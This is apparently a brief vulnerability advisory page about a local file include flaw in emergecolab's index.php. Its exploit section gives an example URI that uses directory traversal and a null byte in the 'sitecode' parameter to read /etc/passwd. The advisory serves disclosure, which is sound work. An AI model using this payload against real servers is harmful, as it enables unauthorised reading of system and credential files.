• info
• discussion
• exploit
• solution
• references

emergecolab 'index.php' Local File Include Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/emerge-1.0/connect/index.php?sitecode=../../../../../../../etc/passwd%00